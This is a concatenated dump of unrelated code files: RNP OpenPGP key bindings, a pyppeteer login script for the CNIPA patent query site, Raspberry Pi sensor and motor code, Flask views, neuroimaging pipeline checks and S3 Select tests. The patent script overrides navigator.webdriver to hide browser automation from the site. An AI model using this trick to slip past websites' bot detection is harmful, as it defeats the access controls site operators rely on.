_call_rop_func(self.__lib.rnp_key_lock, 0, self.__kid)
def unlock(self, password):
_call_rop_func(self.__lib.rnp_key_unlock, 0, self.__kid, password)
def get_uid_handle_at(self, idx, tag=0):
huid = _call_rop_func(self.__lib.rnp_key_get_uid_handle_at, 1, self.__kid, idx)
return _new_rop_obj(self.__own(), ROPE.RNP_SUCCESS, huid, RopUidHandle, tag)
def protect(self, password, cipher, cipher_mode, hash_, iterations):
_call_rop_func(self.__lib.rnp_key_protect, 0, self.__kid, password, cipher, \
cipher_mode, hash_, iterations)
def unprotect(self, password):
_call_rop_func(self.__lib.rnp_key_unprotect, 0, self.__kid, password)
def public_key_data(self):
data, dlen = _call_rop_func(self.__lib.rnp_get_public_key_data, 2, self.__kid)
return _get_rop_data(self.__lib, ROPE.RNP_SUCCESS, data, dlen)
def secret_key_data(self):
data, dlen = _call_rop_func(self.__lib.rnp_get_secret_key_data, 2, self.__kid)
return _get_rop_data(self.__lib, ROPE.RNP_SUCCESS, data, dlen)
def add_uid(self, uid, hash_, expiration, key_flags, primary):
_call_rop_func(self.__lib.rnp_key_add_uid, 0, self.__kid, uid, hash_, expiration, \
key_flags, primary)
def get_subkey_at(self, idx, tag=0):
skey = _call_rop_func(self.__lib.rnp_key_get_subkey_at, 1, self.__kid, idx)
return _new_rop_obj(self.__own(), ROPE.RNP_SUCCESS, skey, RopKey, tag)
def get_signature_at(self, idx, tag=0):
sign = _call_rop_func(self.__lib.rnp_key_get_signature_at, 1, self.__kid, idx)
return _new_rop_obj(self.__own(), ROPE.RNP_SUCCESS, sign, RopSign, tag)
def get_revocation_signature(self, tag=0):
sign = _call_rop_func(self.__lib.rnp_key_get_revocation_signature, 1, self.__kid)
return _new_rop_obj(self.__own(), ROPE.RNP_SUCCESS, sign, RopSign, tag)
def export(self, output, public=True, secret=True, subkey=False, armored=False):
outp = (output.handle if output is not None else None)
flags = (ROPD.RNP_KEY_EXPORT_PUBLIC if public else 0)
flags |= (ROPD.RNP_KEY_EXPORT_SECRET if secret else 0)
flags |= (ROPD.RNP_KEY_EXPORT_SUBKEYS if subkey else 0)
flags |= (ROPD.RNP_KEY_EXPORT_ARMORED if armored else 0)
_call_rop_func(self.__lib.rnp_key_export, 0, self.__kid, outp, flags)
def export_public(self, output, **kwargs):
self.export(output, public=True, secret=False, **kwargs)
def export_secret(self, output, **kwargs):
self.export(output, public=False, secret=True, **kwargs)
def export_autocrypt(self, subkey, uid, output):
subk = (subkey.handle if subkey is not None else None)
outp = (output.handle if output is not None else None)
_call_rop_func(self.__lib.rnp_key_export_autocrypt, 0, self.__kid, subk, uid, outp, 0)
def remove(self, public=True, secret=True, subkeys=False):
flags = (ROPD.RNP_KEY_REMOVE_PUBLIC if public else 0)
flags |= (ROPD.RNP_KEY_REMOVE_SECRET if secret else 0)
flags |= (ROPD.RNP_KEY_REMOVE_SUBKEYS if subkeys else 0)
_call_rop_func(self.__lib.rnp_key_remove, 0, self.__kid, flags)
def remove_public(self, subkeys=False):
self.remove(True, False, subkeys)
def remove_secret(self, subkeys=False):
self.remove(False, True, subkeys)
def export_revocation(self, output, hash_, code, reason):
outp = (output.handle if output is not None else None)
_call_rop_func(self.__lib.rnp_key_export_revocation, 0, self.__kid, outp, 0, hash_, code, reason)
def revoke(self, hash_, code, reason):
_call_rop_func(self.__lib.rnp_key_revoke, 0, self.__kid, 0, hash_, code, reason)
from .sign import RopSign
``` |
{
"source": "jokeaa/CNIPA-Patent-Acquiring",
"score": 3
} |
#### File: jokeaa/CNIPA-Patent-Acquiring/patent_script.py
```python
import asyncio
from pyppeteer import launch
import tkinter
import Sensitive
class Patent():
    def __init__(self):
        # gather the screen size synchronously; the browser itself is launched in setup()
        # because 'await' cannot be used inside a plain __init__
        tk = tkinter.Tk()
        self.width = tk.winfo_screenwidth()
        self.height = tk.winfo_screenheight()
        tk.quit()

    async def setup(self):
        browser = await launch(headless=False,
                               args=[f'--window-size={self.width},{self.height}'],
                               ignoreDefaultArgs="enable-automation")
        self.page = await browser.newPage()
        await self.page.setViewport(viewport={'width': self.width, 'height': self.height})
async def login(self):
await self.page.goto('http://cpquery.cnipa.gov.cn/')
await self.page.evaluate(
'''() =>{ Object.defineProperties(navigator,{ webdriver:{ get: () => false } }) }''')
# await page.evaluate('''() =>{ window.navigator.chrome = { runtime: {}, }; }''')
await self.page.waitForSelector("#publiclogin")
await asyncio.sleep(2)
username = await self.page.waitForSelector("#username1")
await username.type(Sensitive.account_text)
password = await self.page.waitForSelector("#password1")
await password.type(Sensitive.password_text)
wait = input("authentication-done:")
login = await self.page.waitForSelector("#publiclogin")
await login.click()
await asyncio.sleep(2)
agree = await self.page.waitForSelector("#agreeid")
await agree.click()
await asyncio.sleep(0.5)
go_btn = await self.page.waitForSelector("#goBtn")
await go_btn.click()
async def search(self, company=""):
if company == "":
company = "江苏民威电碳科技有限公司"
applicant = await self.page.waitForSelector('#select-key\:shenqingrxm')
await applicant.type(company)
async def run(self):
        await self.setup()
        await self.login()
def main():
pt = Patent()
asyncio.get_event_loop().run_until_complete(pt.run())
asyncio.get_event_loop().run_forever()
if __name__ == '__main__':
main()
``` |
{
"source": "jokedurnez/Flora",
"score": 2
} |
#### File: app/flora/metrics.py
```python
from .utils.Adafruit_I2C import Adafruit_I2C
class Adafruit_ADXL345(Adafruit_I2C):
# Minimal constants carried over from Arduino library
ADXL345_ADDRESS = 0x53
ADXL345_REG_DEVID = 0x00 # Device ID
ADXL345_REG_DATAX0 = 0x32 # X-axis data 0 (6 bytes for X/Y/Z)
    ADXL345_REG_POWER_CTL = 0x2D # Power-saving features control
    ADXL345_REG_DATA_FORMAT = 0x31 # Data format control (referenced by set/getRange below)
    ADXL345_REG_BW_RATE = 0x2C # Data rate and power mode control (referenced by set/getDataRate below)
ADXL345_DATARATE_0_10_HZ = 0x00
ADXL345_DATARATE_0_20_HZ = 0x01
ADXL345_DATARATE_0_39_HZ = 0x02
ADXL345_DATARATE_0_78_HZ = 0x03
ADXL345_DATARATE_1_56_HZ = 0x04
ADXL345_DATARATE_3_13_HZ = 0x05
ADXL345_DATARATE_6_25HZ = 0x06
ADXL345_DATARATE_12_5_HZ = 0x07
ADXL345_DATARATE_25_HZ = 0x08
ADXL345_DATARATE_50_HZ = 0x09
ADXL345_DATARATE_100_HZ = 0x0A # (default)
ADXL345_DATARATE_200_HZ = 0x0B
ADXL345_DATARATE_400_HZ = 0x0C
ADXL345_DATARATE_800_HZ = 0x0D
ADXL345_DATARATE_1600_HZ = 0x0E
ADXL345_DATARATE_3200_HZ = 0x0F
ADXL345_RANGE_2_G = 0x00 # +/- 2g (default)
ADXL345_RANGE_4_G = 0x01 # +/- 4g
ADXL345_RANGE_8_G = 0x02 # +/- 8g
ADXL345_RANGE_16_G = 0x03 # +/- 16g
def __init__(self, busnum=-1, debug=False):
self.accel = Adafruit_I2C(self.ADXL345_ADDRESS, busnum, debug)
if self.accel.readU8(self.ADXL345_REG_DEVID) == 0xE5:
# Enable the accelerometer
self.accel.write8(self.ADXL345_REG_POWER_CTL, 0x08)
def setRange(self, range):
# Read the data format register to preserve bits. Update the data
# rate, make sure that the FULL-RES bit is enabled for range scaling
format = ((self.accel.readU8(self.ADXL345_REG_DATA_FORMAT) & ~0x0F) |
range | 0x08)
# Write the register back to the IC
        self.accel.write8(self.ADXL345_REG_DATA_FORMAT, format)
def getRange(self):
return self.accel.readU8(self.ADXL345_REG_DATA_FORMAT) & 0x03
def setDataRate(self, dataRate):
# Note: The LOW_POWER bits are currently ignored,
# we always keep the device in 'normal' mode
self.accel.write8(self.ADXL345_REG_BW_RATE, dataRate & 0x0F)
def getDataRate(self):
return self.accel.readU8(self.ADXL345_REG_BW_RATE) & 0x0F
# Read the accelerometer
def read(self):
raw = self.accel.readList(self.ADXL345_REG_DATAX0, 6)
res = []
for i in range(0, 6, 2):
g = raw[i] | (raw[i+1] << 8)
if g > 32767: g -= 65536
res.append(g)
return res
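# Illustrative usage (not part of the original module; assumes an ADXL345 on the default I2C bus):
#   accel = Adafruit_ADXL345()
#   x, y, z = accel.read()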
```
#### File: app/flora/motor.py
```python
import RPi.GPIO as GPIO
import time
pins = {
"drive": {
2: 12,
1: 16,
"c": 18
},
"direction": {
1: 19,
2: 21,
"c": 23
}
}
allpins = [v for key,side in pins.items() for k,v in side.items()]
controlpins = [v for key,side in pins.items() for k,v in side.items() if k=='c']
def backward():
GPIO.output(pins['drive']['c'], GPIO.HIGH)
GPIO.output(pins['drive'][1], GPIO.HIGH)
GPIO.output(pins['drive'][2], GPIO.LOW)
def forward():
GPIO.output(pins['drive']['c'], GPIO.HIGH)
GPIO.output(pins['drive'][1], GPIO.LOW)
GPIO.output(pins['drive'][2], GPIO.HIGH)
def stop():
GPIO.output(pins['drive']['c'], GPIO.LOW)
def turn(direction, scale=1, freq=1, dc=50, dur=0.05):
dir1 = 1 if direction == "left" else 2
dir2 = 2 if direction == "left" else 1
GPIO.output(pins['direction'][dir1], GPIO.LOW)
GPIO.output(pins['direction'][dir2], GPIO.HIGH)
p = GPIO.PWM(pins['direction']['c'], freq)
p.start(dc)
time.sleep(dur*scale)
p.stop()
GPIO.output(pins['direction']['c'], GPIO.LOW)
GPIO.output(pins['direction'][dir1], GPIO.LOW)
GPIO.output(pins['direction'][dir2], GPIO.LOW)
def stop_rotation():
GPIO.output(pins['direction']['c'], GPIO.LOW)
def action(action, **kwargs):
if action == "left":
turn("left",**kwargs)
if action == "right":
turn("right",**kwargs)
if action == "forward":
forward()
if action == "backward":
backward()
if action == "stop":
stop()
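# Illustrative calls (assumes setup() has already configured the GPIO pins):
#   action("forward")
#   action("left", scale=2, dur=0.05)
#   action("stop")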
def setup():
GPIO.setmode(GPIO.BOARD)
for pin in allpins:
GPIO.setup(pin, GPIO.OUT)
for controlpin in controlpins:
GPIO.output(controlpin, GPIO.LOW)
def loop():
while True:
print ('Press Ctrl+C to end the program...')
turn("left")
backward()
time.sleep(2)
stop()
time.sleep(0.2)
turn("right")
forward()
time.sleep(2)
stop()
time.sleep(0.2)
def destroy():
stop()
GPIO.cleanup() # Release resource
```
#### File: Flora/app/views.py
```python
from flask import Flask, jsonify, request, render_template, redirect, Response, Blueprint
views = Blueprint('views', __name__, url_prefix='', template_folder='templates')
@views.route('/home', methods = ['GET'])
def home():
return render_template("home.html")
@views.route('/metrics', methods = ['GET'])
def metrics():
return render_template("metrics.html")
@views.route('/stream', methods = ['GET'])
def streamer():
return render_template('streamer.html')
@views.route('/recognise', methods = ['GET'])
def recogniser():
return render_template('recognizer.html')
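# The blueprint is presumably registered on the Flask app elsewhere, e.g.:
#   app.register_blueprint(views)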
``` |
{
"source": "jokedurnez/neuropowertools",
"score": 3
} |
#### File: power/utils/sessions.py
```python
def get_session_id(request):
'''get_session_id gets the user session id, and creates one if it doesn't exist'''
if not request.session.exists(request.session.session_key):
request.session.create()
sid = request.session.session_key
return(sid)
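# Hypothetical usage inside a Django view (illustrative only):
#   def my_view(request):
#       sid = get_session_id(request)
#       ...  # key cached results or DB rows on sid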
``` |
{
"source": "jokedurnez/Psychosis",
"score": 2
} |
#### File: Psychosis/misc/check_rests_preprocessed.py
```python
import os
import pandas as pd
import shutil
import numpy as np
bidsdir = os.environ.get("BIDSDIR")
prepdir = os.environ.get("PREPDIR")
condir = os.environ.get("CONDIR")
participants = pd.read_csv(os.path.join(os.environ.get("TABLEDIR"),'REDCAP_clean.csv'))
remove = False
def remove_con(idx,subject):
condir = os.environ.get("CONDIR")
codedir = os.environ.get("CODEDIR")
consub = os.path.join(condir,'sub-%s'%participant)
if os.path.exists(consub):
shutil.rmtree(consub)
print("removed %s"%consub)
for suffix in ['.err','.out']:
logsub = os.path.join(codedir,'04_connectome/01_timeseries_cleaning/logs/CLEAN_%i%s'%(idx,suffix))
if os.path.exists(logsub):
os.remove(logsub)
print("removed %s"%logsub)
rerun_clean = []
allundone = []
idxundone = []
for idx,row in participants.iterrows():
participant = row.UID
bidssub = os.path.join(bidsdir,"sub-%s"%participant,'func')
rsbids = [x[13:][:-7] for x in os.listdir(bidssub) if x.endswith('bold.nii.gz')]
# check preprocessing
prepsub = os.path.join(prepdir,'sub-%s'%participant,'MNINonLinear/Results')
if not os.path.exists(prepsub):
print("preprocessing folder does not exist: %s - index: %i"%(participant,idx))
continue
rsprep = os.listdir(prepsub)
undone = set(rsbids)-set(rsprep)
if len(list(undone))>0:
print("incomplete preprocessing for subject: %s - index: %i"%(participant,idx))
allundone.append(participant)
idxundone.append(idx)
prepsubdir = os.path.join(prepdir,'sub-%s'%participant)
if remove:
shutil.rmtree(prepsubdir)
for suffix in ['.err','.out']:
logfile = os.path.join(os.environ.get('CODEDIR'),'logs','PREP_%i%s'%(idx,suffix))
if os.path.exists(logfile):
if remove:
os.remove(logfile)
logdir = os.path.join(os.environ.get('CODEDIR'),'logs',participant)
if os.path.exists(logdir):
if remove:
shutil.rmtree(logdir)
# check connectome
consub = os.path.join(condir,'sub-%s'%participant)
if not os.path.exists(consub):
if remove:
remove_con(idx,participant)
print("cleaned folder does not exist: %s - index: %i - removed logs"%(participant,idx))
rerun_clean.append(idx)
continue
consub = os.path.join(condir,'sub-%s'%participant)
rscon = os.listdir(consub)
rscon = [x for x in rscon if x.startswith('task-rest')]
rsprep = [x for x in rsprep if x.startswith('task-rest')]
undone = set(rsprep)-set(rscon)
if len(list(undone))>0:
if remove:
remove_con(idx,participant)
rerun_clean.append(idx)
print("incomplete cleaning for subject: %s - index: %i - removed all"%(participant,idx))
```
#### File: postbids/databasing/update_db.py
```python
from distutils.dir_util import copy_tree
from collections import Counter
from datetime import datetime
import pandas as pd
import numpy as np
import collections
import shutil
import glob
import json
import csv
import sys
import os
sys.path.append(os.environ.get("CODEDIR"))
from prebids.databasing import psydb
from prebids.dicom import dicom
# functions to check if bids is complete
def check_rest_complete(protocols,UID):
incomplete = False
funcdir = os.path.join(os.environ.get("BIDSDIR"),"sub-%s"%UID,'func')
for mod in [('bold','BIC_v2'),('sbref','BIC_v2_SBRef')]:
dbrest = [x for x in protocols if 'REST' in x and x.endswith(mod[1])]
if len(dbrest)==0:
continue
if not os.path.exists(funcdir):
print("Missing func directory while expecting scans for subject %s"%UID)
continue
bidsrest = [x for x in os.listdir(funcdir) if x.endswith("%s.nii.gz"%mod[0]) and 'task-rest' in x]
out = check_exclusions(UID,'rest',mod[0])
if not len(bidsrest)==(len(dbrest)-len(out)):
print("Missing rest (%s) in subject %s: expected %i rests, found %i in bids folder"%(mod[0],UID,len(dbrest),len(bidsrest)))
incomplete = True
return incomplete
def check_dwi_complete(protocols,UID):
incomplete = False
dwidir = os.path.join(os.environ.get("BIDSDIR"),"sub-%s"%UID,'dwi')
for mod in ['dwi','sbref']:
if mod == 'dwi':
dbdwi = [x for x in protocols if 'DWI' in x and not x.endswith("SBRef")]
else:
dbdwi = [x for x in protocols if 'DWI' in x and x.endswith("SBRef")]
if len(dbdwi)==0:
continue
if not os.path.exists(dwidir):
print("Missing dwi directory while expecting scans for subject %s"%UID)
continue
bidsdwi = [x for x in os.listdir(dwidir) if x.endswith("%s.nii.gz"%mod)]
out = check_exclusions(UID,'dwi',mod)
if not len(bidsdwi)==(len(dbdwi)-len(out)):
print("Missing dwi (%s) in subject %s: expected %i dwis, found %i in bids folder"%(mod,UID,len(dbdwi),len(bidsdwi)))
incomplete = True
return incomplete
def check_anat_complete(protocols,UID):
incomplete = False
anatdir = os.path.join(os.environ.get("BIDSDIR"),"sub-%s"%UID,'anat')
for mod in [('T1w','T1w_MPR_BIC_v1'),('T2w','T2w_SPC_BIC_v1')]:
dbanat = [x for x in protocols if x.endswith(mod[1])]
if len(dbanat)==0:
continue
if not os.path.exists(anatdir):
print("Missing anat directory while expecting scans for subject %s"%UID)
continue
bidsanat = [x for x in os.listdir(anatdir) if x.endswith("%s.nii.gz"%mod[0])]
out = check_exclusions(UID,'anat',mod[0])
if not len(bidsanat)==(len(dbanat)-len(out)):
print("Missing aant (%s) in subject %s: expected %i anat, found %i in bids folder"%(mod[0],UID,len(dbanat),len(bidsanat)))
incomplete = True
return incomplete
def check_exclusions(UID,protocol,suffix):
with open(os.environ.get("EXCLUSION"),'r') as fl:
rules = json.load(fl)[0]
removed = []
for k,v in rules['remove'].iteritems():
if UID in v:
removed.append(k)
return [x for x in removed if protocol in x and x.endswith(suffix)]
def check_bids_complete(PSYDB):
DB = pd.read_csv(os.environ.get("NIDBTABLE"))
DB = psydb.remove_old(DB)
DB = psydb.remove_spaces(DB,protocols=True)
DB = psydb.database_exclude(DB)
redo = []
nobids = []
donotproceed = []
for idx,row in PSYDB.iterrows():
subbids = os.path.join(os.environ.get("BIDSDIR"),"sub-%s"%row.UID)
if row.UID == 'S6765IZN':
# this subject will throw errors, but is due to empty files
continue
if not os.path.exists(subbids):
print("No bids directory for %s, rerun analysis %i"%(row.UID,idx))
nobids.append(idx)
donotproceed.append(idx)
protocols = DB[row.UID==DB.UID].Protocol
check1 = check_rest_complete(protocols,row.UID)
check2 = check_dwi_complete(protocols,row.UID)
check3 = check_anat_complete(protocols,row.UID)
if check1 or check2 or check3:
redo.append(row.UID)
donotproceed.append(idx)
print("---------------------------------------------")
print("Consider redownloading and processing subjects: %s"%",".join(redo))
print("Bidsification incomplete for subjects: %s"%",".join([str(x) for x in nobids]))
print("---------------------------------------------")
return donotproceed
# check which analyses are done (folders exist, so should be verified with logs)
def check_analyses(PSYDB):
dicomdir = os.environ.get("DICOMDIR")
bidsdir = os.environ.get("BIDSDIR")
mriqcdir = os.environ.get("MRIQCDIR")
prepdir = os.environ.get("PREPDIR")
cleandir = os.environ.get("CLEANDIR")
condir = os.environ.get("CONDIR")
checking = {"dicom":[],"bids":[],'mriqc':[],'prep':[],'con':[]}
for cols in checking.keys():
PSYDB[cols]=0
for cols in checking.keys():
for idx,row in PSYDB.iterrows():
if cols == 'bids':
call = os.path.exists(os.path.join(bidsdir,"sub-%s"%row.UID))
elif cols == 'mriqc':
call = np.logical_not(np.isnan(row.MRIQC_score))
elif cols == 'prep':
call = os.path.exists(os.path.join(prepdir,"sub-%s"%row.UID))
elif cols == 'con':
call = os.path.exists(os.path.join(condir,"sub-%s"%row.UID))
elif cols == 'dicom':
call = os.path.exists(os.path.join(dicomdir,str(row.UID)))
if call:
PSYDB.at[idx,cols] = 1
return PSYDB
def add_mriqc(PSYDB):
table = os.environ.get("QCTABLE")
generalisation = pd.read_csv(table)
for idx,row in PSYDB.iterrows():
inds = np.where(generalisation.subject_id==row.UID)[0]
if len(inds)>0:
score=generalisation.iloc[inds[0]]['prob_y']
PSYDB.at[idx,'MRIQC_score'] = score
PSYDB.at[idx,'MRIQC_pass'] = score<0.5
return PSYDB
def make_slurm_ready(nums):
iterator = np.sort(nums)
newlist = []
for idx,val in enumerate(iterator):
if idx==0:
newlist.append(str(val))
continue
elif idx == len(iterator)-1:
add = ",%i"%val if newlist[::-1][0]!="-" else str(val)
newlist.append(add)
continue
if iterator[idx-1]==val-1 and iterator[idx+1]==val+1:
if newlist[::-1][0]=='-':
continue
else:
newlist.append("-")
else:
if newlist[::-1][0] == '-':
newlist.append("%i"%val)
else:
newlist.append(",%i"%val)
return "".join(newlist)
def check_bids_modalities(subject):
subdir = os.path.join(os.environ.get("BIDSDIR"),"sub-%s"%subject)
out = {x:False for x in ['dwi','t1','t2','fmap','rest','nback']}
files = glob.glob('%s/*/*'%subdir)
files = ["/".join(x.split("/")[9:]) for x in files]
startend = [('dwi','dwi','','dwi.nii.gz',4),
('t1','anat','','T1w.nii.gz',1),
('t2','anat','','T2w.nii.gz',1),
('rest','func','task-rest','bold.nii.gz',1),
('nback','func','task-nback','bold.nii.gz',1),
('fmap','fmap','','epi.nii.gz',1)]
for check in startend:
fls = [x for x in files if x.startswith(check[1]) and check[2] in x and x.endswith(check[3])]
if len(fls) >= check[4]:
out[check[0]] = True
return out
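# The returned dict flags which modalities are present in the subject's BIDS folder, e.g.
# {'dwi': True, 't1': True, 't2': True, 'fmap': False, 'rest': True, 'nback': False} (illustrative values).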
def checks(check,mod):
if mod == 'todo_qc':
return check['t1'] or check['t2'] or check['rest'] or check['nback']
if mod == 'todo_prep':
return check['t1'] and check['t2'] and check['rest'] and check['fmap']
if mod == 'todo_dwi':
return check['t1'] and check['t2'] and check['dwi']
if mod == 'todo_rest':
return check['t1'] and check['t2'] and check['rest']
def check_analyses_todo(participants):
if not os.path.exists(os.path.join(os.environ.get("MRIQCDIR"),'derivatives')):
qc_done = []
else:
qc_done = os.listdir(os.path.join(os.environ.get("MRIQCDIR"),'derivatives'))
qc_done = list(np.unique([x.split("_")[0] for x in qc_done]))
prep_done = os.listdir(os.environ.get("PREPDIR"))
con_done = os.listdir(os.environ.get("CONDIR"))
participants['todo_qc'] = 0
participants['todo_prep'] = 0
participants['todo_dwi'] = 0
participants['todo_rest'] = 0
for idx,row in participants.iterrows():
check = check_bids_modalities(row.UID)
# check mriqc:
if not 'sub-%s'%row.UID in qc_done and checks(check,'todo_qc'):
participants.at[idx,'todo_qc'] = 1
if not 'sub-%s'%row.UID in prep_done and checks(check,'todo_prep'):
participants.at[idx,'todo_prep'] = 1
if not 'sub-%s'%row.UID in con_done and checks(check,'todo_rest'):
participants.at[idx,'todo_rest'] = 1
if checks(check,'todo_dwi'):
participants.at[idx,'todo_dwi'] = 1
out = {
'qc':list(np.where(participants['todo_qc']==1)[0]),
'prep':list(np.where(participants['todo_prep']==1)[0]),
'dwi':list(np.where(participants['todo_dwi']==1)[0]),
'rest':list(np.where(participants['todo_rest']==1)[0])
}
qc_print = make_slurm_ready(out['qc'])
print('Run MRIQC on the following indexes: %s'%qc_print)
prep_print = make_slurm_ready(out['prep'])
print('Run preprocessing on the following indexes: %s'%prep_print)
dwi_print = make_slurm_ready(out['dwi'])
print('Run dwi on the following indexes (note that there s not a good check at this point): %s'%dwi_print)
con_print = make_slurm_ready(out['rest'])
print("Run clean on the following indexes: %s"%con_print)
return out
``` |
{
"source": "joke-lee/s3-tests",
"score": 3
} |
#### File: s3tests_boto3/functional/test_s3select.py
```python
import nose
import random
import string
from nose.plugins.attrib import attr
import uuid
from nose.tools import eq_ as eq
from . import (
get_client
)
region_name = ''
# recursion function for generating an arithmetical expression
def random_expr(depth):
# depth is the complexity of expression
if depth==1 :
return str(int(random.random() * 100) + 1)+".0"
return '(' + random_expr(depth-1) + random.choice(['+','-','*','/']) + random_expr(depth-1) + ')'
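# For instance, depth=1 always yields a single float literal such as "42.0", while depth=3
# can produce a nested expression like "((37.0+4.0)*(12.0-99.0))" (illustrative examples).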
def generate_s3select_where_clause(bucket_name,obj_name):
a=random_expr(4)
b=random_expr(4)
s=random.choice([ '<','>','==','<=','>=','!=' ])
try:
eval( a )
eval( b )
except ZeroDivisionError:
return
    # generate an s3select statement using the generated random expression;
    # count(0) > 0 means the where-clause expression evaluated to true,
    # so the python engine (eval of the same conditional expression) should return the same boolean result.
s3select_stmt = "select count(0) from stdin where " + a + s + b + ";"
res = remove_xml_tags_from_result( run_s3select(bucket_name,obj_name,s3select_stmt) ).replace(",","")
nose.tools.assert_equal(int(res)>0 , eval( a + s + b ))
def generate_s3select_expression_projection(bucket_name,obj_name):
    # generate an s3select statement using the generated random expression;
    # the statement returns an arithmetical result for the generated expression.
    # the same expression is evaluated by the python engine; results should agree to within epsilon.
e = random_expr( 4 )
try:
eval( e )
except ZeroDivisionError:
return
if eval( e ) == 0:
return
res = remove_xml_tags_from_result( run_s3select(bucket_name,obj_name,"select " + e + " from stdin;",) ).replace(",","")
# accuracy level
epsilon = float(0.000001)
# both results should be close (epsilon)
assert (1 - (float(res.split("\n")[1]) / eval( e )) ) < epsilon
def get_random_string():
    return uuid.uuid4().hex[:6].upper()

@attr('s3select')
def test_generate_where_clause():
# create small csv file for testing the random expressions
single_line_csv = create_random_csv_object(1,1)
bucket_name = "test"
obj_name = get_random_string() #"single_line_csv.csv"
upload_csv_object(bucket_name,obj_name,single_line_csv)
for _ in range(100):
generate_s3select_where_clause(bucket_name,obj_name)
@attr('s3select')
def test_generate_projection():
# create small csv file for testing the random expressions
single_line_csv = create_random_csv_object(1,1)
bucket_name = "test"
obj_name = get_random_string() #"single_line_csv.csv"
upload_csv_object(bucket_name,obj_name,single_line_csv)
for _ in range(100):
generate_s3select_expression_projection(bucket_name,obj_name)
def create_csv_object_for_datetime(rows,columns):
result = ""
for _ in range(rows):
row = ""
for _ in range(columns):
row = row + "{}{:02d}{:02d}-{:02d}{:02d}{:02d},".format(random.randint(0,100)+1900,random.randint(1,12),random.randint(1,28),random.randint(0,23),random.randint(0,59),random.randint(0,59),)
result += row + "\n"
return result
def create_random_csv_object(rows,columns,col_delim=",",record_delim="\n",csv_schema=""):
result = ""
if len(csv_schema)>0 :
result = csv_schema + record_delim
for _ in range(rows):
row = ""
for _ in range(columns):
row = row + "{}{}".format(random.randint(0,1000),col_delim)
result += row + record_delim
return result
def create_random_csv_object_string(rows,columns,col_delim=",",record_delim="\n",csv_schema=""):
result = ""
if len(csv_schema)>0 :
result = csv_schema + record_delim
for _ in range(rows):
row = ""
for _ in range(columns):
if random.randint(0,9) == 5:
row = row + "{}{}".format(''.join(random.choice(string.ascii_letters) for m in range(10)) + "aeiou",col_delim)
else:
row = row + "{}{}".format(''.join("cbcd" + random.choice(string.ascii_letters) for m in range(10)) + "vwxyzzvwxyz" ,col_delim)
result += row + record_delim
return result
def upload_csv_object(bucket_name,new_key,obj):
client = get_client()
client.create_bucket(Bucket=bucket_name)
client.put_object(Bucket=bucket_name, Key=new_key, Body=obj)
# validate uploaded object
c2 = get_client()
response = c2.get_object(Bucket=bucket_name, Key=new_key)
    eq(response['Body'].read().decode('utf-8'), obj, 's3select error: downloaded object not equal to uploaded object')
def run_s3select(bucket,key,query,column_delim=",",row_delim="\n",quot_char='"',esc_char='\\',csv_header_info="NONE"):
s3 = get_client()
r = s3.select_object_content(
Bucket=bucket,
Key=key,
ExpressionType='SQL',
InputSerialization = {"CSV": {"RecordDelimiter" : row_delim, "FieldDelimiter" : column_delim,"QuoteEscapeCharacter": esc_char, "QuoteCharacter": quot_char, "FileHeaderInfo": csv_header_info}, "CompressionType": "NONE"},
OutputSerialization = {"CSV": {}},
Expression=query,)
result = ""
for event in r['Payload']:
if 'Records' in event:
records = event['Records']['Payload'].decode('utf-8')
result += records
return result
def remove_xml_tags_from_result(obj):
result = ""
for rec in obj.split("\n"):
if(rec.find("Payload")>0 or rec.find("Records")>0):
continue
result += rec + "\n" # remove by split
return result
def create_list_of_int(column_pos,obj,field_split=",",row_split="\n"):
list_of_int = []
for rec in obj.split(row_split):
col_num = 1
if ( len(rec) == 0):
continue
for col in rec.split(field_split):
if (col_num == column_pos):
list_of_int.append(int(col))
col_num+=1
return list_of_int
@attr('s3select')
def test_count_operation():
csv_obj_name = get_random_string()
bucket_name = "test"
num_of_rows = 1234
obj_to_load = create_random_csv_object(num_of_rows,10)
upload_csv_object(bucket_name,csv_obj_name,obj_to_load)
res = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select count(0) from stdin;") ).replace(",","")
nose.tools.assert_equal( num_of_rows, int( res ))
@attr('s3select')
def test_column_sum_min_max():
csv_obj = create_random_csv_object(10000,10)
csv_obj_name = get_random_string()
bucket_name = "test"
upload_csv_object(bucket_name,csv_obj_name,csv_obj)
csv_obj_name_2 = get_random_string()
bucket_name_2 = "testbuck2"
upload_csv_object(bucket_name_2,csv_obj_name_2,csv_obj)
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select min(int(_1)) from stdin;") ).replace(",","")
list_int = create_list_of_int( 1 , csv_obj )
res_target = min( list_int )
nose.tools.assert_equal( int(res_s3select), int(res_target))
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select min(int(_4)) from stdin;") ).replace(",","")
list_int = create_list_of_int( 4 , csv_obj )
res_target = min( list_int )
nose.tools.assert_equal( int(res_s3select), int(res_target))
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select avg(int(_6)) from stdin;") ).replace(",","")
list_int = create_list_of_int( 6 , csv_obj )
res_target = float(sum(list_int ))/10000
nose.tools.assert_equal( float(res_s3select), float(res_target))
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select max(int(_4)) from stdin;") ).replace(",","")
list_int = create_list_of_int( 4 , csv_obj )
res_target = max( list_int )
nose.tools.assert_equal( int(res_s3select), int(res_target))
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select max(int(_7)) from stdin;") ).replace(",","")
list_int = create_list_of_int( 7 , csv_obj )
res_target = max( list_int )
nose.tools.assert_equal( int(res_s3select), int(res_target))
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select sum(int(_4)) from stdin;") ).replace(",","")
list_int = create_list_of_int( 4 , csv_obj )
res_target = sum( list_int )
nose.tools.assert_equal( int(res_s3select), int(res_target))
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select sum(int(_7)) from stdin;") ).replace(",","")
list_int = create_list_of_int( 7 , csv_obj )
res_target = sum( list_int )
nose.tools.assert_equal( int(res_s3select) , int(res_target) )
    # the following queries validate, on *random* input, an *accurate* relation between the condition result, the sum operation and the count operation.
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name_2,csv_obj_name_2,"select count(0),sum(int(_1)),sum(int(_2)) from stdin where (int(_1)-int(_2)) == 2;" ) )
count,sum1,sum2,d = res_s3select.split(",")
nose.tools.assert_equal( int(count)*2 , int(sum1)-int(sum2 ) )
